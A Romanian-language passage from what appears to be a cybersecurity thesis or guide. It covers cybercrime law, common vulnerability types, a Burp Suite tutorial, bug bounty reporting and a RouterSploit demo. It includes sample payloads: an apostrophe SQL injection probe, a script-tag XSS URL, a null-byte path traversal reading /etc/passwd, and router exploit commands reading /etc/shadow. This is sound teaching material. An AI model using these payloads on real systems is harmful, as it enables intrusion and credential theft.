b) fapta de a produce, vinde, de a importa, distribui sau de a pune la dispoziție, sub orice altă formă, fără drept, a unei parole, cod de acces sau alte asemenea date informatice care permit accesul total sau parțial la un sistem informatic în scopul săvârșirii uneia din infracțiunile prevăzute la art.42-45.

(2) Cu aceeași pedeapsă se sancționează și deținerea, fără drept, a unui dispozitiv, program informatic, parolă, cod de acces sau dată informatică dintre cele prevăzute la alin.(1) în scopul săvârșirii uneia din infracțiunile prevăzute la art.42-45.

Art.47 – Tentativa infracțiunilor prevăzute la art.42-46 se pedepsește.

Infracțiuni informatice

Art.48. – Fapta de a introduce, modifica sau șterge, fără drept, date informatice ori de a restricționa, fără drept, accesul la aceste date, rezultând date necorespunzătoare adevărului, în scopul de a fi utilizate în vederea producerii unei consecințe juridice, constituie infracțiune și se pedepsește cu închisoare de la 2 la 7 ani.

Art.49 – Fapta de a cauza un prejudiciu patrimonial unei persoane prin introducerea, modificarea sau ștergerea de date informatice, prin restricționarea accesului la aceste date ori prin împiedicarea în orice mod a funcționării unui sistem informatic, în scopul de a obține un beneficiu material pentru sine sau pentru altul, constituie infracțiune și se pedepsește cu închisoare de la 3 la 12 ani.

Art.50 – Tentativa infracțiunilor prevăzute la art.48 și art. 49 se pedepsește.

I.3. Ce este o vulnerabilitate și care sunt tipurile de vulnerabilități ?

Ce reprezintă o vulnerabilitate ?

Acest termen, are referire la slăbiciunea unui sistem ori a unei aplicații web, prin care un atacator poate provoca anumite daune.

Ce este o vulnerabilitate 0 day ?

Este o problemă de securitate care nu este rezolvată și această denumire vine de la faptul că nimeni nu știe de existența unei vulnerabilități, înafară de persoana care a descoperit-o.

Termenul exploit, ce înseamnă ?

Se referă la un mecanism sau o modalitate, prin care, folosindu-se de mai multe vulnerabilități sau de una, un atacator poate modifica, extrage și citii anumite informații aflate într-un sistem vulnerabil. Este o aplicație malițioasă sau o comandă.

Ce înseamnă ROOT ?

Un utilizator privilegiat pe linux este cunoscut ca root sau superuser. Are posibilitatea de a adăuga, modifica și sterge orice fișier. Pe langă acest lucrul, are și acces la toate comenzile din sistem.

Domain Name System (DNS)

DNS sau Domain Name System, este un serviciu de registru Internet distribuit. Este o modalitate de a asocia numele unui site web cu o adresă IP pentru a fi mai ușor de memorat.

Buffer overflow

Ce semnifică vulnerabilitatea buffer overflow?

Pentru a înțelege ce este buffer overflow, trebuie să înțelegem mecanismul de funcționare a memoriei. Memoria unui sistem de calcul sau a unui calculator este una din cele mai importante componente. Datorită acestei componente se redă viteza de execuție a programelor. Cu cât este mai mare cu atât este mai performant calculatorul și din această cauză putem naviga mai rapid prin programe.

Datorită memoriei, putem păstra date permanent sau temporar. Memoria se caracterizează prin: dimensiune – cu cât este mai mare dimensiunea memoriei, cu atât calculatorul se aproprie de performanțe mai mari.

Dimensiunea memoriei se exprimă în mega bytes. Memoria se caracterizează și prin timpul de reacție reprezentat în nanosecunde. Cu cât este mai mare dimensiunea memoriei cu atât timpul de răspuns este mai mic.

Există două tipuri de memorie:

memorie R.A.M ( sau tradus random access memory )

memorie R.O.M ( sau tradus read only memory )

Memoria R.A.M este memoria ce păstrează programele și datele temporar. Memoriile R.A.M pot fi dinamice și statice în funcție de cum sunt implementate. Ea este formată din elemente ce reprezintă două stări și anume, 0 și 1 numite cifre binare sau biți.

Este compusă din milioane de elemente dispuse pe rânduri și coloane sub formă de fagure. Accesul la memorie se face la nivelul celulei sau locației de memorie.

Fiecărei locații de memorie îi este adresată manual o adresă care identifică acea locație. Numărul de biți care se poate memora într-o locație de memorie reprezintă lungimea cuvântului de memorie. Numărul total de locații de memorie se reprezintă în octeți și este capacitatea memoriei.

Memoria R.O.M este memoria care nu se șterge și rămâne de obicei permanentă. Din această memorie face parte BIOS-ul și bootloader-ul. Acest tip de memorie nu se șterge la închiderea calculatorului.

Ce este o vulnerabilitate de tip buffer overflow?

O condiție buffer overflow există atunci când o persoană trimite printr-o cerere o cantitate de date mai mare decât o anumită funcție poate reține. Un buffer este o secțiune a memoriei alocate pentru a memora de la un caracter până la o listă de caractere. Dacă se încearcă scrierea în afara programului, a memoriei, de cele mai multe ori se întâmplă ca programul să afișeze o eroare și programul se va opri din activitate, apoi, prin manipularea memoriei se vor executa activități malițioase. Buffer overflow este cea mai cunoscută vulnerabilitate de experții în securitate. Severitatea este foarte ridicată. Rulează în majoritatea aplicațiilor dezvoltate în C si C++.

S.Q.L Injection:

SQL Injection este una dintre cele mai vechi tipuri de vulnerabilități web, prima discuție publică despre aceasta apărând în Phrack Magazine în jurul anului 1998.

Deși este o vulnerabilitate cu peste 15 ani vechime, aceasta continuă să fie în topul celor mai periculoase vulnerabilități și este surprinzător de întâlnită și la momentul actual în ciuda faptului că este foarte ușor de securizat.

O aplicație web obișnuită va trimite datele introduse de către utilizator cu ajutorul unor limbaje de programare ca PHP, Python sau altele pentru prelucrarea si procesarea acestora intr-o bază de date. De exemplu, un motor de căutare va prelua un text introdus de utilizator, va creea o interogare spre procesare cu ajutorul unui limbaj de programare: PHP sau Python în acest caz, apoi va trimite bazei de date interogările cu textul căutat. Baza de date trimite un răspuns cu ce a găsit în tabele înapoi aplicației web pe care aceasta va afișa utilizatorului un rezultat. În cazul în care nu se vor lua măsuri de prevenire a acestui atac, atacatorul ar putea introduce coduri malițioase care apoi să fie executate pentru a lua date din baza de date. În exemplul nostru, atacatorul ar putea introduce coduri malițioase în loc de textul care să fie căutat. Aplicația va genera o interogare care include codul acestuia și o va trimite către baza de date pentru a fi executată. SQL Injection este o vulnerabilitate care se găsește de obicei în aplicațiile web, prin care, atacatorul are posibilitatea de a modifica, insera sau a șterge înregistrările dintr-o bază de date folosind comenzi SQL.

Acum mai bine de 15 ani când a fost exploatată pentru prima dată, se obișnuia să se introducă un apostrof(') în URL sau în unele câmpuri și să se urmărească comportamentul aplicației web. Acel apostrof vede dacă interogarea SQL este vulnerabilă provocând astfel o eroare. În mod ironic, se folosește chiar și în zilele de azi această metodă.

Sfaturi pentru a evita această vulnerabilitate:

1.Trebuie verificat dacă input-ul conține tipul de date cerut.

2. Întotdeauna trebuie să se introducă datele preluate de la utilizator(care vor fi folosite în query) între apostrofuri și în același timp să se folosească funcția mysql_real_escape_string().

Exemplu:

mysql_query("SELECT * FROM tabel where id = '".mysql_real_escape_string($date_utilizator)."'");

Se pot identifica parametrii vulnerabili, dacă, atacatorul testează interogarea și parametrii site-ului, spre exemplu:

Presupunem că aplicației web i s-a transmis o interogare prin metoda GET /page?id= 1337':

https://appvulnerabila.ro/page.php?id=1337’

Atacatorul va căuta dacă în browser îi va apărea o eroare, de genul: „You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'page' and id="1337’"; '' at line 1”.

Sunt utilizate 4 tipuri de cereri în limbajul S.Q.L și anume: select, insert, update, delete.Autorul atacului va încerca prin mai multe interogări, aflarea tabelelor și a bazelor de date.

Cross Site Scripting:

Cross-site-scripting este o vulnerabilitate web apărută la nefiltrarea anumitor parametrii și datorită acestui fapt, atacatorul poate introduce cod malițios destinat pentru furtul de cookie al administratorului sau al altor utilizatori ce folosesc platforma/site-ul web. Un cookie este un text ce se salvează într-un fișier. Putem spune despre cookie că este folosit ca un card de identificare de către browser-ul web a unui utilizator. Atunci când utilizatorul intră pe un site, sesiunea sau cookie-ul se salvează pentru respectivul site, apoi, când utilizatorul vareintra peacel site sesiunea este salvată și browserul știe că utilizatorul a mai fost pe acel site.

Dacă un utilizator se înregistrează pe un site datele de autentificare sunt stocate într-un cookie. Astfel, dacă un client se înregistrează pe un site, datele de conectare îi rămân în cookie și astfel, de fiecare dată când intră pe acel site, el este conectat datorită cookie-ului salvat.

Prin această vulnerabilitate se pot injecta coduri malițioase în site/aplicație, se pot fura cookie-uri și se poate ajunge chiar la furtul contului de administrator, în cel mai rău caz.

Sunt trei tipuri de Cross-site-scripting:

Cross-site-scripting Reflected (reflectat) – este atunci când un atacator poate să insereze intr-o pagină web un cod malițios. Această vulnerabilitate este des întâlnită, afectează partea de client și are un impact medium.

Cross-site-scripting Stored (persistent) – acesta este cel mai periculos tip de cross-site-scripting, deoarece, odată ce atacatorul a introdus un cod malițios într-o pagină web, codul se va executa de fiecare dată când vom accesa pagina. Pentru a prevenii acest lucru, este necesară implementarea funcțiilor htmlentities și htmlspecialchars cu ENT_QUOTES în formularele sau paginile infectate pentru filtrarea caracterelor de tip: <>”// ce fac posibilă apariția acestor vulnerabilități. Aceasta vulnerabilitate, are un impact mare.

Document Object Model Based Cross-Site Scripting (DOM XSS) – Această vulnerabilitate este diferită față de celelalte, deoarece datele care sunt trimise de utilizator, vor fi evaluate la nivel de client-side și nu de către server.

Arbitrary Code Execution

Această vulnerabilitate permite atacatorului executarea unei comenzi malițioase. Acest lucru poate duce la preluarea controlului unei stații sau al unui server. Această vulnerabilitate este foarte periculoasă deoarece permite atât citirea unor funcții și fișiere din server, cât și uploadarea unui script malițios prin care atacatorul va avea acces la tot serverul. Un exemplu, este uploadarea unui script php numit shell și prin acesta atacatorul poate sa obțină toate datele unui sistem. Din această vulnerabilitate au derivat local file inclusion și remote file inclusion. Pentru a securiza aceste probleme de securitate este necesar adăugarea unor funcții de securizare în php, partea de server-side.

DOS/DDOS:

Un atac de tip DOS / DDoS este cel mai întâlnit tip atac. Distributed Denial of Service (DoS) și Distributed Denial Of Service (DDoS) este o încercare de bloca resursele unui sistem/server prin trimiterea mai multor pachete dinspre o sursă sau mai multe surse.

Protecția acestui atac se face cu ajutorul administratorilor de sistem și a I.S.P-ului. Pentru filtrarea acestor atacuri, se folosește firewall-uri puternice.

Broken Authentification:

Atunci când se foloseste o aplicație web, browser-ul comunica cu server-ul aplicației web trimițând și primind mesaje prin intermediul Hypertext Transfer Protocol (HTTP). HTTP este un protocol "apatrid", asta însemnă că serverul nu reține datele printre request–uri.

Acesta tratează fiecare mesaj trimis de cineva, complet independent de alte mesaje trimise de altcineva. Din această cauză și din cauza erorilor logice, apare acest tip de vulnerabilitate numit Broken Authentification. Sfaturi pentru a evita această vulnerabilitate este să se utilizeze un sistem unic de autentificare pentru a nu permite conectarea la o pagină care pare să fie criptată dar certificatul este invalid.

Poison Null Byte:

Poison Byte Null exploatează șirurile de caractere cu o lungime cunoscută care poate să conțină biți cu o valoare nulă, la fel se poate întâmpla și cu A.P.I-ul acestora. Prin plasarea unui octet NULL în șir la un anumit octet, programul se va opri sau va cauza o eroare de program, datorită acelui bit adăugat cu valoare nulă.

Exemplu:

<?

$FIȘIER = $_GET['fisier'];

Require_once(“/var/www/home1/$fișier.php’);

?>

Se poate exploata în felul următor:

http://www.exemplusite.ro/pagina.php?fisier=../../etc/passwd%00

După cum se poate observa se adaugă un bit null de formă, %00 și atunci se poate injecta chiar și cod malițios sau se poate ajunge chiar la citirea anumitor fișiere de pe server.

Un exemplu de exploatare se poate face și în cazul în care se folosește Adobe Reader, unde, atacatorul poate controla sau manipula un fișier .pdf, prin înregistrarea unui bit null sau prin accesarea memoriei vulnerabile.

Exemplu:

0x87F23AE1 MOV EAX,[EDI+5]

0x87F23AE5 MOV ECX,[EDI+C]

0x87F23AED MOV [ECX],EAX

În aceast exemplu, versiunea mai veche de Adobe Reader, prin schimbarea pointerilor și alocarea unei memorii nule, se poate injecta un cod malițios, denumit execuția unui cod arbitrar.

ARP Spoofing:

A.R.P sau Address Resolution Protocol este folosit de hosturile din rețea pentru a anunța IP-urile în rețea și pentru a evita problema de duplicate IP. Atacatorul se folosește de IP-ul destinație când cineva din rețea încearcă să-l acceseze.

MAC Flooding:

Constă în trimiterea de adrese MAC-uri generate random. Fiecare Switch are CAM Table sau Content Addressable Memory și se folosește de CAM Table pentru a stoca informații despre fiecare adresă MAC conectată fizic la unul din porturile Switch-ului. Atacatorul generează foarte multe adrese MAC și Switch-ul nu va mai putea procesa datele primite de la ceilalți utilizatori.

DHCP Starvation:

DHCP Starvation se produce atunci când un atacator trimite un număr nelimitat de request-uri DHCP. DHCP este un protocol folosit pentru ca un router să aloce IP-uri în rețea.

O dată ce toate IP-urile au fost alocate atacatorului, atunci, nici un alt utilizator din rețea nu se va mai conecta în rețea.

Rogue DHCP:

Atacul Rogue DHCP este un server de DHCP presetat de către atacator pentru a aloca IP-uri în rețea și de a modifica calea traficului către internet. Prin acest mod se pot face analize de trafic și toate datele trimise de utilizator în internet sau în rețea sunt compromise.

Vlan Hopping:

Vlan hopping apare atunci când o rețea virtuală destinată de exemplu managementului poate fi accesată în mod voit din rețeaua virtuală destinată elevilor.

Spanning Tree Protocol Attack:

Atacul se bazează pe STP. STP este folosit pentru a menține o ordine stabilă și fără loop-uri într-o rețea de tip Layer 2. Mesajele sunt trimise cu ajutorul BPDU – Bridge protocol dată units.

Atacatorul poate trimite BPDU-uri nelimitate și poate cauza un Denial of Service.

IP Spoofing:

Atacatorul trimite pachete cu IP-ul destinație al routerului pentru a păcăli un alt utilizator să trimită pachete către acesta crezând că este chiar router-ul.

Teardrop Attack:

Este un atac de tip DoS pentru a compromite validitatea sistemului. Constă în trimiterea unor datagrame de IP fragmentate, ce poate cauza un crash-ul sistemului.

ICMP Attacks:

ICMP este un protocol pentru a schimba mesaje de control și a determina dacă un sistem răspunde sau este activ. Cu ajutorul ICMP-ului se poate cauza Denial of Service.

Ping Flood este o metodă de a trimite numeroase pachete unei victime cu scopul de a-I compromite sistemul.

Ping of Death:

Se trimit cereri ICMP Echo cu pachete fragmentate. Valoarea unui pachet ICMP: 65507. Fragmentarea IP permite bypass-ul valorii maxime: (offset + size) > 65535 (64KB).

Anumite sisteme de operare nu pot reasambla un pachet mai mare de 65KB și duc la compromiterea sistemului.

ICMP Redirect Attack:

ICMP Redirect Attack se folosește când un atacator încearcă să redirecteze sursa unui host către un gateway sau către un router controlat de el.

Acest gateway sau router virtual poate fi al atacatorului. Atacatorul poate retrimite traficul și poate intercepta rețeaua. Atacatorul poate avea sursa IP și adresa MAC exact ca cea a gateway-ului real astfel încât, traficul victimei să poată fi interceptat.

Smurf Attack:

Este un tip de atac Denial Of Service unde un atacator trimite mai multe cereri de ICMP de pe mai multe IP-uri pentru a amplifica traficul și a trimite traficul către adresa IP vizată.

Trojan:

Este unul dintre cei mai complexi viruși. Majoritatea trojenilor au fost dezvoltați speciali pentru a ataca rețelele bancare. Exemplu: Zeus, SpyEye, Sub7, SpySheriff, Zlob. Are proprietăți de a-și ascunde activitatea după alte procese și aflarea datelor introduse de utilizatori, de exemplu: conturile bancare, conturile de email sau alte conturi.

Worm:

Acest tip de virus este unul dintre coșmarurile administratorilor de rețea. El cauta și încearcă să se replice de la un sistem la altul prin rețeaua internă sau externă.

Spyware:

Este un virus intelligent ce este folosit pentru spionarea unui calculator/calculatoare. Acesta, ca și Trojan-ul, se ascunde după anumite procese. Este foarte greu de detectat și are proprietăți de ascundere a codului sursa cu ajutorul criptării și a schimbării unor informații din metadata, astfel, ca la Trojan, acesta nu mai poate fi detectat de anumiți antiviruși.

Boot Sector Virus:

Este un virus ce este instalat în sectorul boot al sistemului, în termeni tehnici denumit ca Master Boot Record. Infectează și BIOS-ul. Este foarte greu de detectat. Virusul operează doar atunci când sistemul este pornit și se folosesc comenzi DOS pentru accesarea acestuia.

Virus:

Virusul este un program malițios ce se replicăși are ca scop coruperea altor programe și distrugerea sistemului. Virusul este folosit în scopurile de astăzi pentru obținerea unor sume de bani, de exemplu Ransomware, un virus inteligent folosit pentru a cripta datele unui utilizator.

Acești viruși sunt stealth și armored.

De ce avem nevoie de instrumente (tool-uri) ?

Într-un audit de securitate, cunoașterea instrumentelor (tool-urilor) care ne ajută este foarte esențială. Fiecare aplicație web conține o mulțime de resurse si tehnologii. Scopul folosirii a acestora este să ne ajute să analizăm și să întelegem comportamentul aplicațiilor web.

Figura 1. 8– Tool-uri web

Sistemele de operare:

Figura 1. 9– Sisteme de operare

Auditul se poate realiza pe mai multe sisteme de operare, atât pe Mac OS X, Linux sau Windows. Nu are importanță. De reținut este că, totuși trebuie să alegem o platformă care ne oferă mai multe avatanje. De recomandat, este să folosim următoarele distribuții și acestea sunt: ParrotSec sau Kali Linux. Ele au fost concepute pentru pen testing.

Browser-ul web:

Pentru penetration testing este recomandat să utilizați Mozilla Firefox, deoarece există numeroase addon-uri pentru a ne ușura munca într-un audit de securitate și este ușor de personalizat. Câteva addon-uri utile pe care le putem instala: Web Developer, Hackbar, Live HTTP Headers, Tamper Data, etc.

Figura 1. 10– Navigatoare Web

I.3.1 Despre Burp Suite

Burp Suite este o aplicație scrisă în limbajul de programare Java. Cu ajutorul acestei aplicații, putem să interceptăm traficul web printr-o arhitectură proxy și să analizăm/modificăm fiecare cerere ori răspuns. Există o diferență între un server proxy și un proxy de interceptare și nu este același lucru. Sunt disponibile două versiuni de Burp Suite. Una dintre ele este gratuită, iar pentru cealaltă versiune trebuie să plătim o anumită sumă de bani. Foarte mulți specialiști și cercetători în securitate folosesc această aplicație deoarece oferă foarte multe facilități.

Figura 1. 11– Bup Suite

Figura 1. 12– Versiuni Burp Suite

Instalarea și configurarea aplicației Burp Suite:

Pentru a putea rula aplicația pe sistemul de operare trebuie să vă instalați, prima dată Java. Ca să rulăm aplicația, trebuie să dăm următoarea comandă în terminal sau command prompt:

java -jar /calea/catrefisier/burpsuite.jar

Calea către fișier trebuie să o știm înainte de a rula aplicația.

În cazul meu, aplicația mea se află pe Desktop și voi da urmatoarea comandă (Figura x.x):

java -jar /home/drs18/Desktop/burpsuite.jar

Figura 1. 13– Rulare Burp Suite

Următorii pași sunt: „Next” și „Start Burp”. După cum puteți observa, aplicația noastră rulează pe 127.0.0.1 folosind portul 8080. Ca traficul nostru să treacă prin proxy, va trebui să configurăm browser-ul. Vom folosii Mozilla Firefox. Mergem la „Preferences” =>„Advanced” =>„Network”. Ultima opțiune o bifăm din acea listăși introducem valoarea 127.0.0.1 în campul HTTP Proxy și 8080 la port.

Trebuie bifat și „Use this proxy server for all protocols”.

Figura 1. 14– Setări proxy

Burp Proxy:

Ne permite de a intercepta traficul și de a modifica cererile HTTP înainte ca ele să fie trimise către server. Pentru a putea intercepta traficul, ne ducem la „Proxy” => „Intercept” și apăsăm pe „Intercept is OFF/ON”. La fel, facem și când dorim să oprim interceptarea.

Figura 1. 15– Burp Proxy

Când vom accesa o pagină web, datele pe care le-am capturat, vor fi afișate în modul următor.

Figura 1. 16– Cerere HTTP capturată

După modificarea cererii HTTP, apăsăm pe butonul „Forward” pentru a trimite cererea către server-ul web. Dacă dorim să nu trimitem cererea, apăsăm pe butonul „Drop”. Burp suite colectează informații, chiar dacă interceptarea este oprită. Informațiile care au fost interceptate, le putem vizualiza accesând tab-ul „HTTP History”.

Figura 1. 17– History HTTP

Burp Spider:

Burp Spider memorează și aranjează toate cererile HTTP pentru a avea niște evidențe mai clare asupra fișierelor și tehnologiilor care sunt folosite de către site-ul web.

Pentru a identifica fișierele pe care le-am scăpat, ne ducem la tab-ul „Target” => „Site map”. Dăm click dreapta pe adresa aplicației web si apăsăm pe "Spider this host".

Figura 1. 18– Burp Spider

Burp Repeater:

Îl putem folosii pentru a repeta anumite cereri HTTP sau de a creea manual una sau mai multe cereri. Ne ajută să înțelegem comportamentul aplicației și în descoperirea anumitor vulnerabilități. Pentru a repeta o cerere HTTP, ne ducem la „Proxy” =>„HTTP History”, iar din lista de mai jos, selectăm o adresă web, click dreapta și „Send to Repeater”.

Figura 1. 19– Burp Repeater

Burp Intruder:

Cu ajutorul acestuia putem să testăm într-un mod automat cum reactionează ținta când introducem anumite payload-uri.

Este unul dintre instrumentele cele mai utile și putem să descoperim anumite probleme de securitate sau erori logice.

Figura 1. 20– Burp Intruder

I.4. Nevoia de securitate

Figura 1. 21– Piramida lui Maslow

Securitatea înseamnă abilitatea de a face față agresiunii externe și interne. Absența amenințărilor la adresa valorilor dobândite și absența temerii că valorile vor fi atacate. Securitatea ocupa locul II în Piramidă lui Maslow și a fost definită încă de începutul lumii, de când omul a fost creat. Există mai multe tipuri de securitate: Militară, Politică, Economică, de Mediu, Societală.

Securitatea este predecesorul școlii realiste. Se pune accentul pe conceptul de putere și echilibrul de putere. Predecesorii securității sunt unii din titanii generației actuale și anume: Henry Kissinger, Zbingniew Brzezinski, Machiavelii.

Securitatea informatică în acest caz este contracararea și protejarea unui sistem informatic împotriva riscurilor și a vulnerabilităților exterioare și interioare. Triada C.I.A este foarte importantă în a definii aspectele principale unui sistem informatic din punct de vedere al securității.

Nevoia de securitate și de protecția vieții private este un subiect din ce în ce mai mult dezbătut la fiecare conferință, întrunire sau forumuri de discuții. Securitatea, chiar dacă este garantată de guverne, instituții de securitate și servicii secrete, armată sau consilii de securitate, terorismul este și va fi unul dintre principalele mijloace de generare a fricii, sentiment ce poate fi conectat cu nevoia de securitate. Orice sistem deține o poartă de intrare, oricât de mică ar fi ea și de aceea nu există sistem perfect închis.

Cyber Security este un subiect care va deveni unul dintre cele mai importante și mai de luat în calcul în următoarea perioadă. Cyber war sau terorismul cybernetic a luat amploare încă din anii 2000. Există foarte multe vulnerabilități care nu au fost găsite și este foarte probabil că acestea să producă multe pagube infrastructurilor de toate tipurile.

I.5. Securizarea computerului personal

Infrastructura personală sau în termeni tehnici Small Office / Home Office este rețeaua noastră personală pe care o folosim de acasă când dorim să accesăm internetul. Acesta poate fi alcătuită dintr-un Wireless Router, Firewall, PC-uri personale, I.o.T sau alte dispozitive.

În acest capitol se vor enumera principalele măsuri de securitate a router-ului personal, al rețelei dar mai mult decât atât și cum puteți să vă securizați calculatorul personal, pentru a evita principalele atacuri informatice.

1. Instalați un Windows 7 cu licență, deoarece, cele piratate pot avea viruși ascunși sau alte probleme de software. Fie că folosiți Windows 7, 8, 10 e necesar cu licență și îl puteți cumpăra de pe site-ul oficial Microsoft.

2. Instalați un Antivirus. Există foarte multe soluții anti-virus pe piață. De asemenea, dacă alegeți pachetul premium, aveți un avantaj, deoarece, antivirușii premium conțin un plus de module de securitate.

Figura 1. 22– Programe antivirus

Folosind site-ul Toptenreviews, putem vedea un top al celor mai buni Antiviruși de pe piață. Puteți alege care doriți dumneavoastră.

3. Instalați programele dintr-o sursă sigură. Descărcați programele doar de pe site-ul oficial și verificați cu VirusTotal fiecare descărcare a fișierelor pentru a vă asigura că nu descărcați un virus. Pentru a verifica un site intrăm pe site-ul : https://www.virustotal.com, apăsam pe „Choose File’’ și adăugăm fișierul apoi apăsam butonul „Scan it”. După acest pas, ne uităm atent la
„Analysis” și verificăm în parte rezultatele obținute de fiecare antivirus în parte, deoarece, acest site folosește mai multe baze de date de la mai mulți antiviruși pentru a scana și căuta un anumit tip de virus localizat într-un fișier executabil. Puteți să căutați și alternative a site-ului virustotal, pentru a fi siguri că verificați în mai multe părți.

4. Recomandarea specialiștilor este să folosiți o mașină virtuală și să rulați programele și fișierele pe care le primiți acolo. Puteți instala gratuit VMware Player sau VirtualBox. Pentru a instala un al II-lea Windows în VMware procedați astfel:

a. Deschideți executabilul VMware Player, click pe Next, selectați folderul unde doriți să instalați VMware și apoi Finish.

Figura 1. 23– Programul VMware Workstation 12 Player

b. Click pe browse și localizați Windows-ul pe care doriți să l instalați sub forma *.iso.

c. Click pe „Next”.

d. La virtual machine name puteți redenumi cum doriți mașina virtuală, exemplu : MasinaTeste

e. Click pe “Next”.

f. La capacitate, recomandat este să aveți minim 10 GB și maxim 20 GB.

Figura 1. 24– Alocare spațiu HDD

g. Click pe „Next”.

h.Customize Hardware.

i. La secțiunea Memory alocați 512 MB din Memorie, la secțiunea Processors alegeți doi, la Network Adapter folosiți doar Bridged : Connected directly to the physical network.

Apoi click pe butonul „close” și instalațiWindows-ul ales de dumneavoastră. Pe acel Windows este recomandat să instalațiun Antivirus gratuit și să descărcațitoate fișierele externe acolo pentru a vă proteja principalul sistem de operare.

Figura 1. 25– Configurarea mașinăriei virtuale

Capitolul II

TOTUL DESPRE PROGRAMELE BUG BOUNTY

II.1 Ce este un program de tip Bug Bounty

Un program bug bounty presupune descoperirea iar apoi semnalarea unei vulnerabilități într-un sistem sau într-o aplicație web. Un copil de 10 ani din Finlanda pe nume Jani, a găsit o vulnerabilitate într-o aplicație web, care aparține de compania Facebook și acesta a primit 10.000$ ca recompensă. Vulnerabilitatea pe care a găsit-o în platforma de socializare, Instagram, îi permitea să șteargă orice comentariu, de pe orice cont.

Figura 2. 1– Program Bug Bounty

II.2. Ce companii mari folosesc programele de tip Bug Bounty

Principalele companii ce au un program Bug Bounty sunt: Google, Facebook, RedHat, BarracudaLabs, Microsoft, eBay, PayPal, OwnCloud, Yahoo, Telekom, AVG, Sony, Avast, Nokia, Samsung, etc. În general toate companiile mari au un program de acest fel.

În partea următoare este prezentat întocmirea unui raport de vulnerabilitate și răspunsul primit din partea companiilor ce oferă recompense pentru găsirea vulnerabilităților în serviciile acestora.

II.3. Exemplu raport program Bug Bounty

Exemplu raport în limba română pentru programul Bug Bounty a celor de la Google:

Descrierea vulnerabilității:

Domeniul care aparține companiei Google este vulnerabil la cross-site-scripting reflectat deoarece datele de intrare nu sunt filtrate ori să fie validate corect.

Acest lucru poate duce la următoarele lucruri :

– furtul de cookie

– phishing

– introducerea unui cod malițios ce poate afecta domeniul respectiv

Demonstrație:

Pentru a reproduce această problemă, vom accesa link-ul de mai jos:

https://www.google.ro/search?q=<script>alert(1)</script>&aqs=chrome..69i57j0l5.192j0j7&sourceid=chrome&ie=UTF-8

În această demonstrație, putem observa, că în parametrul “q” am introdus următorul vector ce ne arată că aplicația este vulnerabilă la acest tip de vulnerabilitate.

Remediere:

Pentru remediere, vom folosii funcția htmlentities sau htmlspecialchars, pentru a filtra segmentele malițioase ce duc la apariția acestei vulnerabilități.

Informații adiționale:

Despre Cross Site Scripting: en.wikipedia.org/wiki/Cross-site_scripting.

Alte exemple de rapoarte:

O vulnerabilitate de tip cross-site-scripting reflectat a fost descoperită în aplicația Microsoft Exchange Server 2013 (Outlook Web Access) care acesta furnizează serviciul de e-mail.

Figura 2. 2– Cross-site-scripting reflectat în aplicația OWA (Outlook Web Acces)

Figura 2. 3– Lista cu cercetătorii din domeniul securității – Microsoft Top 100 (2015)

O vulnerabilitate de tip cross-site-scripting reflected a fost identificată și raportată companiei Workday.

Figura 2. 4– Cross-site-scripting reflected în aplicația web Workday.

În programul Bug Bounty de la HBO (Home Box Office), am găsit o problemă de securitate ce îmi permitea să extrag anumite informații din baza de date. Este vorba despre SQL Injection.

Figura 2. 5– SQL Injection – HBO

O altă vulnerabilitate, numită Remote Code Execution, îmi permitea să urc orice tip de fișier pe server-ul web. Toate aceste probleme au fost remediate rapid de către companie.

Figura 2. 6– Executare cod de la distanță (RCE) – Partea I

Figura 2. 7– Executare cod de la distanță (RCE) – Partea II

Capitolul III

Descoperirea vulnerabilitățiilor

III.1. RouterSploit – Penetration Testing Framework

Acest software este folosit pentru căutarea vulnerabilităților în arhitecturile networking de tip SOHO (Small Office/Home Office) și în camerele (CCTV) de tip I.o.T și are ca scop secundar căutarea credentialelor default din orice dispozitiv (Router, Switch, Dispozitiv I.o.T, Access Point).

Această demonstrație a fost efectuată folosind sistemul de operare Linux Parrot Security (ParrotSEC) versiunea x64 biti.Pentru instalare necesită modulul python 2.7 instalat.

Comenzile date în terminal:

• apt-get install python python2.7

• apt-get install python-dev python-pip libncurses5-dev

• cd exploitframework

• pip install -r requirements.txt

• python exploit.py

Opțiuni:

rsf > show all – arată toate dispozitivele

rsf > show options – arata opțiunile alternative

rsf > use scanners/autopwn – folosește scanarea automată

rsf > set target 10.10.10.1 – setează IP-ul device-ului targetat

rsf > run – rulează exploit-ul

În această demonstrație, am folosit un router TP-LINK 740ND care este vulnerabil la un anumit tip de vulnerabilitate. Router-ul TP-Link WR740ND, are un server HTTP ce rulează pe portul 80 și care gestionează interfața de administrare web.

Există o vulnerabilitate numită „File Traversal Path” în URI "/ help", care permite atacatorilor să citească orice fișier, inclusiv configurații.

În exemplul meu, pentru a scana acest dispozitiv, vom da următoarea comandă în Terminal.

use scanners/autopwn

Ne selectăm ținta, după aceea vom da „run” . Următoarele comenzi vor fi:

set target 192.168.0.1, iar după aceea „Run”.

Figura 3. 1 – Scanare automată

După scanare, vom copia „exploits/routers/tplink/wdr740nd_wdr740n_path_traversal” și vom da următoarea comandă pentru a folosii acest exploit:

use exploits/routers/tplink/wdr740nd_wdr740n_path_traversal

Comanda “check” verfică dacă ținta este vulnerabilă.

Figura 3. 2– Rezultatul scanării

Pentru a citii un anumit fișier de pe acest dispozivitiv, vom scrie următoarea comandă. În acest exemplu, va fi în felul următor:

set filename /etc/shadow

După executarea comenzii „Run”, putem vedea în imaginea de mai jos, că atacul a fost finalizat cu succes.

Figura 3. 3– Citirea fișierelor de pe dispozitiv

III.2. Stack Buffer Overflow

Reverse engineering sau simplu R.E reprezintă principiile unei aplicații prin analiza structurii, funcțiilor și a operațiilor.

Cu ajutorul R.E un cercetător, programator sau analist de securitate poate să descopere multe anomalii: examinează structura unui program sau examinează structura întregului sistem pentru a descoperi nereguli. Cu ajutorul reverse engineering se pot găsidate sensibile în cod, se poate modifica funcționalitatea unui program, se pot găsi vulnerabilități și se poate analiza fișierele de tip malware.

Pentru a avea idee despre reverse engineering este necesar ca cel care dorește să învețe și să obțină cât mai multe cunoștințe despre acest domeniu trebuie să cunoască limbajul de asamblare (assembly). Fiecare sistem fie că vorbim de router, switch, calculator, s.a.m.d, conține un microprocessor ce se ocupă de activitățile sistemului respectiv.

Fiecare familie de procesoare deține propriul set de instrucțiuni pentru multiple operații, de exemplu: pentru input-output, controlul dispozitivelor periferice, optimizarea spațiului, ș.a.m.d. Acest set de instrucțiuni mai este cunoscutși ca instrucții ale codului mașină.

Un procesor poate să interpreteze date și să aplice șiruri de caractere 0 și 1 pentru fiecare operație în parte. Este dificil pentru un om să înțeleagă codul mașină și de aceea se folosește assembly.

